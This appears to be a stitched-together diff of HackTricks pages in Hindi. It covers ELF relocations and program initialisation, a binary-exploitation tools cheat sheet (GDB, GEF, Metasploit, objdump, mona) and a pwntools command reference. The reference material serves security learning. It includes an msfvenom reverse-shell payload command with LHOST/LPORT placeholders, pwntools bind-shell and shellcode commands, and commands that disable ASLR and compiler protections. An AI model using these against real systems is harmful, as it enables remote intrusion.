00000001ffd8 001400000401 R_AARCH64_GLOB_DA 0000000000000000 stdout@GLIBC_2.17 + 0
00000001ffe0 001e00000401 R_AARCH64_GLOB_DA 0000000000000000 __gmon_start__ + 0
00000001ffe8 001f00000401 R_AARCH64_GLOB_DA 0000000000000000 __stack_chk_guard@GLIBC_2.17 + 0
00000001fff8 002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0
Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fe70 000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0
00000001fe78 000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0
00000001fe80 000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0
00000001fe88 000600000402 R_AARCH64_JUMP_SL 0000000000000000 fputs@GLIBC_2.17 + 0
00000001fe90 000700000402 R_AARCH64_JUMP_SL 0000000000000000 exit@GLIBC_2.17 + 0
00000001fe98 000800000402 R_AARCH64_JUMP_SL 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
00000001fea0 000900000402 R_AARCH64_JUMP_SL 0000000000000000 perror@GLIBC_2.17 + 0
00000001fea8 000b00000402 R_AARCH64_JUMP_SL 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001feb0 000c00000402 R_AARCH64_JUMP_SL 0000000000000000 putc@GLIBC_2.17 + 0
00000001feb8 000d00000402 R_AARCH64_JUMP_SL 0000000000000000 opendir@GLIBC_2.17 + 0
00000001fec0 000e00000402 R_AARCH64_JUMP_SL 0000000000000000 fputc@GLIBC_2.17 + 0
00000001fec8 001100000402 R_AARCH64_JUMP_SL 0000000000000000 snprintf@GLIBC_2.17 + 0
00000001fed0 001200000402 R_AARCH64_JUMP_SL 0000000000000000 __snprintf_chk@GLIBC_2.17 + 0
00000001fed8 001300000402 R_AARCH64_JUMP_SL 0000000000000000 malloc@GLIBC_2.17 + 0
00000001fee0 001500000402 R_AARCH64_JUMP_SL 0000000000000000 gettimeofday@GLIBC_2.17 + 0
00000001fee8 001600000402 R_AARCH64_JUMP_SL 0000000000000000 sleep@GLIBC_2.17 + 0
00000001fef0 001700000402 R_AARCH64_JUMP_SL 0000000000000000 __vfprintf_chk@GLIBC_2.17 + 0
00000001fef8 001800000402 R_AARCH64_JUMP_SL 0000000000000000 calloc@GLIBC_2.17 + 0
00000001ff00 001900000402 R_AARCH64_JUMP_SL 0000000000000000 rewind@GLIBC_2.17 + 0
00000001ff08 001a00000402 R_AARCH64_JUMP_SL 0000000000000000 strdup@GLIBC_2.17 + 0
00000001ff10 001b00000402 R_AARCH64_JUMP_SL 0000000000000000 closedir@GLIBC_2.17 + 0
00000001ff18 001c00000402 R_AARCH64_JUMP_SL 0000000000000000 __stack_chk_fail@GLIBC_2.17 + 0
00000001ff20 001d00000402 R_AARCH64_JUMP_SL 0000000000000000 strrchr@GLIBC_2.17 + 0
00000001ff28 001e00000402 R_AARCH64_JUMP_SL 0000000000000000 __gmon_start__ + 0
00000001ff30 002000000402 R_AARCH64_JUMP_SL 0000000000000000 abort@GLIBC_2.17 + 0
00000001ff38 002100000402 R_AARCH64_JUMP_SL 0000000000000000 feof@GLIBC_2.17 + 0
00000001ff40 002200000402 R_AARCH64_JUMP_SL 0000000000000000 getopt_long@GLIBC_2.17 + 0
00000001ff48 002300000402 R_AARCH64_JUMP_SL 0000000000000000 __fprintf_chk@GLIBC_2.17 + 0
00000001ff50 002400000402 R_AARCH64_JUMP_SL 0000000000000000 strcmp@GLIBC_2.17 + 0
00000001ff58 002500000402 R_AARCH64_JUMP_SL 0000000000000000 free@GLIBC_2.17 + 0
00000001ff60 002600000402 R_AARCH64_JUMP_SL 0000000000000000 readdir64@GLIBC_2.17 + 0
00000001ff68 002700000402 R_AARCH64_JUMP_SL 0000000000000000 strndup@GLIBC_2.17 + 0
00000001ff70 002800000402 R_AARCH64_JUMP_SL 0000000000000000 strchr@GLIBC_2.17 + 0
00000001ff78 002900000402 R_AARCH64_JUMP_SL 0000000000000000 fwrite@GLIBC_2.17 + 0
```plaintext
00000001ff80 002a00000402 R_AARCH64_JUMP_SL 0000000000000000 fflush@GLIBC_2.17 + 0
00000001ff88 002b00000402 R_AARCH64_JUMP_SL 0000000000000000 fopen64@GLIBC_2.17 + 0
00000001ff90 002c00000402 R_AARCH64_JUMP_SL 0000000000000000 __isoc99_sscanf@GLIBC_2.17 + 0
00000001ff98 002d00000402 R_AARCH64_JUMP_SL 0000000000000000 strncpy@GLIBC_2.17 + 0
00000001ffa0 002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0
00000001ffa8 003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0
```
### स्थैतिक पुनर्स्थापना
यदि **प्रोग्राम पसंदीदा पते से भिन्न स्थान पर लोड** किया गया है (सामान्यत: 0x400000) क्योंकि पता पहले से ही उपयोग में है या **ASLR** या किसी अन्य कारण से, एक स्थैतिक पुनर्स्थापना **सही करती है** जिन पॉइंटर्स के मान प्रत्याशित पते पर बाइनरी लोड होने की उम्मीद हैं।
उदाहरण के लिए किसी भी प्रकार का खंड `R_AARCH64_RELATIV` को पुनर्स्थापना बायस प्लस एडेंड मान परिवर्तित करना चाहिए।
### गतिशील पुनर्स्थापना और GOT
पुनर्स्थापना एक बाह्य प्रतीक को भी संदर्भित कर सकती है (जैसे किसी निर्भरता से फ़ंक्शन की तरह). जैसे libC से malloc फ़ंक्शन। तो, जब लोडर libC को एक पते पर लोड करता है जहां malloc फ़ंक्शन लोड होता है, तो यह malloc का पता GOT (Global Offset Table) तालिका में लिखेगा (पुनर्स्थापना तालिका में सूचित) जहां malloc का पता निर्दिष्ट होना चाहिए।
### प्रक्रिया संबंधन सारणी
PLT खंड को आलसी बाइंडिंग करने की अनुमति देता है, जिसका मतलब है कि फ़ंक्शन के स्थान का संक्षेप पहली बार जब यह उपयोग किया जाता है, तब किया जाएगा।
तो जब एक प्रोग्राम malloc को कॉल करता है, वास्तव में यह `malloc` के संबंधित स्थान को PLT में कॉल करता है (`malloc@plt`)। जब यह पहली बार कॉल होता है, तो यह `malloc` का पता स्थानांतरित करता है और इसे संग्रहीत करता है ताकि अगली बार `malloc` को कॉल किया जाए, उस पते का उपयोग PLT कोड की बजाय किया जाए।
## प्रोग्राम प्रारंभीकरण
प्रोग्राम लोड होने के बाद इसे चलाने का समय है। हालांकि, पहला कोड जो चलाया जाता है **हमेशा `main` नहीं** होता है। यह इसलिए है क्योंकि उदाहरण के लिए C++ में यदि एक **वैश्विक चर** एक कक्षा का वस्तु है, तो यह वस्तु **प्रारंभ** **होनी चाहिए** **पहले** जब main चलता है, जैसे:
```cpp
#include <stdio.h>
// g++ autoinit.cpp -o autoinit
class AutoInit {
public:
AutoInit() {
printf("Hello AutoInit!\n");
}
~AutoInit() {
printf("Goodbye AutoInit!\n");
}
};
AutoInit autoInit;
int main() {
printf("Main\n");
return 0;
}
```
नोट करें कि ये ग्लोबल वेरिएबल्स `.data` या `.bss` में स्थित होते हैं लेकिन सूचियों `__CTOR_LIST__` और `__DTOR_LIST__` में ऑब्जेक्ट्स को इनिशियलाइज और डीस्ट्रक्ट करने के लिए स्टोर किया जाता है ताकि उनका ट्रैक रखा जा सके।
सी कोड से GNU एक्सटेंशन का उपयोग करके एक ही परिणाम प्राप्त किया जा सकता है:
```c
__attributte__((constructor)) //Add a constructor to execute before
__attributte__((destructor)) //Add to the destructor list
```
कॉंपाइलर की दृष्टि से, `main` फ़ंक्शन के पहले और बाद में इन क्रियाओं को निष्पादित करने के लिए, `init` फ़ंक्शन और `fini` फ़ंक्शन बनाना संभव है जिन्हें डायनामिक सेक्शन में **`INIT`** और **`FIN`** के रूप में संदर्भित किया जा सकता है और ये ELF के `init` और `fini` सेक्शन में रखे जाते हैं।
दूसरा विकल्प, जैसा कि उल्लिखित है, है **`INIT_ARRAY`** और **`FINI_ARRAY`** प्रविष्टियों में **`__CTOR_LIST__`** और **`__DTOR_LIST__`** की संदर्भित करना और इनकी लंबाई को **`INIT_ARRAYSZ`** और **`FINI_ARRAYSZ`** द्वारा दर्शाया जाता है। प्रत्येक प्रविष्टि एक फ़ंक्शन पॉइंटर है जिसे कोई आर्ग्यूमेंट के बिना बुलाया जाएगा।
इसके अतिरिक्त, **`INIT_ARRAY`** पॉइंटरों से **पहले** निष्पादित होने वाले **पॉइंटर** के साथ एक **`PREINIT_ARRAY`** भी संभव है।
### प्रारंभीकरण क्रम
1. प्रोग्राम को मेमोरी में लोड किया जाता है, स्थायी ग्लोबल वेरिएबल्स **`.data`** में आरंभित किए जाते हैं और अस्थायी वेरिएबल्स **`.bss`** में जीरो किए जाते हैं।
2. प्रोग्राम या लाइब्रेरी के सभी **विभिन्नताएँ** **आरंभित** की जाती हैं और **डायनामिक लिंकिंग** को निष्पादित किया जाता है।
3. **`PREINIT_ARRAY`** फ़ंक्शनों को निष्पादित किया जाता है।
4. **`INIT_ARRAY`** फ़ंक्शनों को निष्पादित किया जाता है।
5. अगर एक **`INIT`** प्रविष्टि है तो इसे बुलाया जाता है।
6. यदि एक लाइब्रेरी है, तो dlopen यहाँ समाप्त होता है, यदि एक प्रोग्राम है, तो असली प्रवेश बिंदु (`main` फ़ंक्शन) को बुलाने का समय है।
## धागा-स्थानीय संग्रहण (TLS)
इन्हें C++ में **`__thread_local`** शब्द का उपयोग करके या GNU एक्सटेंशन **`__thread`** का उपयोग करके परिभाषित किया जाता है।
प्रत्येक धागा इस वेरिएबल के लिए एक अद्वितीय स्थान बनाएगा ताकि केवल धागा ही अपनी वेरिएबल तक पहुँच सके।
जब यह उपयोग किया जाता है तो ELF में **`.tdata`** और **`.tbss`** का उपयोग किया जाता है। जो कि `.data` (आरंभित) और `.bss` (अस्थायी रूप से निर्मित) की तरह हैं लेकिन TLS के लिए।
प्रत्येक वेरिएबल के लिए एक एंट्री होगी जो आकार और TLS ऑफसेट को निर्दिष्ट करेगी, जो धागे के स्थानीय डेटा क्षेत्र में उपयोग करेगा।
`__TLS_MODULE_BASE` एक प्रतीक है जो धागा-स्थानीय संग्रहण के आधार पते को संदर्भित करने के लिए उपयोग किया जाता है और एक मॉड्यूल के सभी धागा-स्थानीय डेटा को समेत करने वाले मेमोरी क्षेत्र को संदर्भित करता है।

245
binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md Normal file
View file

@ -0,0 +1,245 @@
# उपकरणों का शोध
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
## Metasploit
```bash
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
### शैलकोड
{% code overflow="wrap" %}
```bash
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
{% endcode %}
## GDB
### इंस्टॉल
```bash
apt-get install gdb
```
### पैरामीटर
```bash
-q # No show banner
-x <file> # Auto-execute GDB instructions from here
-p <pid> # Attach to process
```
### निर्देश
```bash
run # Execute
start # Start and break in main
n/next/ni # Execute next instruction (no inside)
s/step/si # Execute next instruction
c/continue # Continue until next breakpoint
p system # Find the address of the system function
set $eip = 0x12345678 # Change value of $eip
help # Get help
quit # exit
# Disassemble
disassemble main # Disassemble the function called main
disassemble 0x12345678 # Disassemble taht address
set disassembly-flavor intel # Use intel syntax
set follow-fork-mode child/parent # Follow child/parent process
# Breakpoints
br func # Add breakpoint to function
br *func+23
br *0x12345678
del <NUM> # Delete that number of breakpoint
watch EXPRESSION # Break if the value changes
# info
info functions --> Info abount functions
info functions func --> Info of the funtion
info registers --> Value of the registers
bt # Backtrace Stack
bt full # Detailed stack
print variable
print 0x87654321 - 0x12345678 # Caculate
# x/examine
examine/<num><o/x/d/u/t/i/s/c><b/h/w/g> dir_mem/reg/puntero # Shows content of <num> in <octal/hexa/decimal/unsigned/bin/instruction/ascii/char> where each entry is a <Byte/half word (2B)/Word (4B)/Giant word (8B)>
x/o 0xDir_hex
x/2x $eip # 2Words from EIP
x/2x $eip -4 # $eip - 4
x/8xb $eip # 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
i r eip # Value of $eip
x/w pointer # Value of the pointer
x/s pointer # String pointed by the pointer
x/xw &pointer # Address where the pointer is located
x/i $eip # Instructions of the EIP
```
### [GEF](https://github.com/hugsy/gef)
आप वैकल्पिक रूप से [**इस GE**](https://github.com/bata24/gef)[**F**](https://github.com/bata24/gef) का उपयोग कर सकते हैं जिसमें और रोचक निर्देश शामिल हैं।
```bash
help memory # Get help on memory command
canary # Search for canary value in memory
checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings
xinfo <addr> # Shows page, size, perms, memory area and offset of the addr in the page
memory watch 0x784000 0x1000 byte #Add a view always showinf this memory
got #Check got table
memory watch $_got()+0x18 5 #Watch a part of the got table
# Vulns detection
format-string-helper #Detect insecure format strings
heap-analysis-helper #Checks allocation and deallocations of memory chunks:NULL free, UAF,double free, heap overlap
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Dump memory to file
dump binary memory /tmp/dump.bin 0x200000000 0x20000c350
#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
```
### ट्रिक्स
#### GDB समान पते
जब आप GDB को डिबग कर रहे होंगे तो GDB के पते **बाइनरी चलाया जाता है उससे थोड़े भिन्न होंगे।** आप GDB को ऐसे ही पतों पर ले आ सकते हैं:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _बाइनरी के पूर्ण पथ डालें_
* उसी पूर्ण पथ का उपयोग करके बाइनरी का शोषण करें
* GDB का उपयोग करते समय `PWD` और `OLDPWD` समान होना चाहिए जब आप बाइनरी का शोषण कर रहे हों
#### फ़ंक्शन कोल करने के लिए बैकट्रेस
जब आपके पास एक **स्थिर रूप से लिंक किया गया बाइनरी** होता है तो सभी फ़ंक्शन बाइनरी के होते हैं (और किसी बाहरी पुस्तकालय के नहीं)। इस मामले में **बाइनरी द्वारा अनुसरण किया जाने वाला फ्लो निश्चित करना मुश्किल होगा उदाहरण के लिए उपयोगकर्ता इनपुट के लिए पूछने के लिए**।\
आप आसानी से इस फ्लो को पहचान सकते हैं **चलाकर** बाइनरी को **gdb** के साथ जब तक आपसे इनपुट के लिए पूछा जाता है। फिर, **CTRL+C** का उपयोग करके इसे रोकें और फ़ंक्शन कोल करने के लिए **`bt`** (**बैकट्रेस**) कमांड का उपयोग करें:
```
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDB सर्वर
`gdbserver --multi 0.0.0.0:23947` (IDA में आपको लिनक्स मशीन में executable का पूर्ण पथ भरना होगा और विंडोज मशीन में)
## Ghidra
### स्टैक ऑफसेट खोजें
**Ghidra** बहुत उपयोगी है ताकि आप **स्थानीय वेरिएबल्स की स्थिति के बारे में जानकारी के कारण एक बफर ओवरफ्लो के लिए ऑफसेट खोज सकें।**\
उदाहरण के लिए, नीचे दिए गए उदाहरण में, `local_bc` में एक बफर फ्लो दिखाता है कि आपको `0xbc` का एक ऑफसेट की आवश्यकता है। इसके अतिरिक्त, अगर `local_10` एक कैनरी कुकी है तो यह सूचित करता है कि इसे `local_bc` से ओवरराइट करने के लिए `0xac` का एक ऑफसेट है।\
_ध्यान रखें कि RIP को बचाया गया पहला 0x08 RBP से संबंधित है।_
![](<../../../.gitbook/assets/image (1061).png>)
## qtool
```bash
qltool run -v disasm --no-console --log-file disasm.txt --rootfs ./ ./prog
```
## GCC
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> सुरक्षा के साथ कंपाइल करें बिना\
**-o** --> आउटपुट\
**-g** --> कोड सहेजें (जीडीबी इसे देख सकेगा)\
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> लिनक्स में ASLR को निष्क्रिय करने के लिए
**एक शेलकोड को कंपाइल करने के लिए:**\
**nasm -f elf assembly.asm** --> ".o" लौटाएगा\
**ld assembly.o -o shellcodeout** --> एक्जीक्यूटेबल
## Objdump
**-d** --> **एक्जीक्यूटेबल** सेक्शन को डिसएसेंबल करें (कंपाइल किए गए शेलकोड के ऑपकोड देखें, ROP गैजेट्स खोजें, फ़ंक्शन पता लगाएं...)\
**-Mintel** --> **इंटेल** सिंटैक्स\
**-t** --> **सिम्बल्स** तालिका\
**-D** --> **सभी** डिसएसेंबल करें (स्टेटिक वेरिएबल का पता)\
**-s -j .dtors** --> dtors सेक्शन\
**-s -j .got** --> got सेक्शन\
\-D -s -j .plt --> **plt** सेक्शन **डिकंपाइल**\
**-TR** --> **रीलोकेशन्स**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> "puts" का पता बदलने के लिए\
**objdump -D ./exec | grep "VAR\_NAME"** --> स्टेटिक वेरिएबल का पता (ये डेटा सेक्शन में स्टोर होते हैं).
## Core dumps
1. मेरे प्रोग्राम शुरू करने से पहले `ulimit -c unlimited` चलाएं
2. `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` चलाएं
3. `sudo gdb --core=\<path/core> --quiet` चलाएं
## More
**ldd executable | grep libc.so.6** --> पता (अगर ASLR है, तो यह हर बार बदल जाएगा)\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> पता बहुत बार बदलता है या नहीं देखने के लिए लूप\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> "system" का ऑफसेट\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> "/bin/sh" का ऑफसेट
**strace executable** --> एक्जीक्यूटेबल द्वारा बुलाए गए फ़ंक्शन\
**rabin2 -i ejecutable -->** सभी फ़ंक्शनों का पता
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
## IDA
### रिमोट लिनक्स में डीबगिंग
IDA फ़ोल्डर के अंदर आप उन binaries को पा सकते हैं जो लिनक्स के अंदर एक binary को डीबग करने के लिए उपयोग किया जा सकता है। इसके लिए `linux_server` या `linux_server64` binary को लिनक्स सर्वर के अंदर ले जाएं और उसे उस फ़ोल्डर के अंदर चलाएं जो बाइनरी को संभालता है:
```
./linux_server64 -Ppass
```
तो, डीबगर कॉन्फ़िगर करें: डीबगर (लिनक्स रिमोट) --> प्रोसेस विकल्प...:
![](<../../../.gitbook/assets/image (858).png>)
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह, यानी [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फ़ॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

172
binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md Normal file
View file

@ -0,0 +1,172 @@
# PwnTools
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
```
pip3 install pwntools
```
## Pwn एसेम्बलर
लाइन या फ़ाइल से **ओपकोड** प्राप्त करें।
```
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**चयन करें:**
* आउटपुट प्रकार (रॉ, हेक्स, स्ट्रिंग, ईएलएफ)
* आउटपुट फ़ाइल संदर्भ (16,32,64,लिनक्स,विंडोज...)
* बाइट्स से बचें (न्यू लाइन, नल, एक सूची)
* जीडीबी का उपयोग करके डीबग शेलकोड को चलाने के लिए आउटपुट का चयन करें
## **Pwn checksec**
Checksec स्क्रिप्ट
```
pwn checksec <executable>
```
## पून constgrep
## पून cyclic
एक पैटर्न प्राप्त करें
```
pwn cyclic 3000
pwn cyclic -l faad
```
**का चयन करें:**
* प्रयुक्त वर्णमाला (डिफ़ॉल्ट रूप से लोअरकेस वर्ण)
* अद्वितीय पैटर्न की लंबाई (डिफ़ॉल्ट 4)
* संदर्भ (16,32,64,लिनक्स,विंडोज...)
* ऑफसेट लें (-l)
## पॉन डीबग
प्रक्रिया को GDB से जोड़ें
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**चयन कर सकते हैं:**
* कार्यक्रम, नाम या पिडी संदर्भ (16,32,64,linux,windows...) द्वारा
* निष्पादन करने के लिए gdbscript
* सिसरूटपथ
## Pwn disablenx
एक बाइनरी का एनएक्स अक्षम करें
```
pwn disablenx <filepath>
```
## Pwn disasm
हेक्स ओपकोड को disasemble करें
```
pwn disasm ffe4
```
**का चयन करें:**
* संदर्भ (16,32,64,लिनक्स,विंडोज...)
* मूल पता
* रंग (डिफ़ॉल्ट)/कोई रंग नहीं
## Pwn elfdiff
2 फ़ाइलों के बीच अंतर प्रिंट करें
```
pwn elfdiff <file1> <file2>
```
## हेक्स प्राप्त करें
हेक्साडेसिमल प्रतिनिधित्व प्राप्त करें
```bash
pwn hex hola #Get hex of "hola" ascii
```
## पून पीएचडी
हेक्सडंप प्राप्त करें
```
pwn phd <file>
```
**चयन करें:**
* दिखाने के लिए बाइटों की संख्या
* प्रति पंक्ति हाइलाइट बाइट की संख्या
* शुरुआत में बाइट्स को छोड़ें
## Pwn pwnstrip
## Pwn scrable
## Pwn shellcraft
शैलकोड प्राप्त करें
```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**चयन करें:**
* शैलकोड और शैलकोड के लिए तर्क
* आउट फ़ाइल
* आउटपुट प्रारूप
* डीबग (शैलकोड को dbg से जोड़ें)
* पहले (कोड से पहले डीबग ट्रैप)
* बाद
* ओपकोड का उपयोग न करें (डिफ़ॉल्ट: नल और नई लाइन)
* शैलकोड चलाएं
* रंग/कोई रंग नहीं
* सिसकॉल्स की सूची
* संभावित शैलकोड की सूची
* ELF को एक साझा पुस्तकालय के रूप में उत्पन्न करें
## Pwn टेम्पलेट
एक पायथन टेम्पलेट प्राप्त करें
```
pwn template
```
**का चयन करें:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत
## Pwn अनहेक्स
हेक्स से स्ट्रिंग में
```
pwn unhex 686f6c61
```
## Pwn अपडेट
pwntools को अपडेट करने के लिए
```
pwn update
```
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

80
generic-methodologies-and-resources/pentesting-methodology.md
View file

@ -6,17 +6,17 @@
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
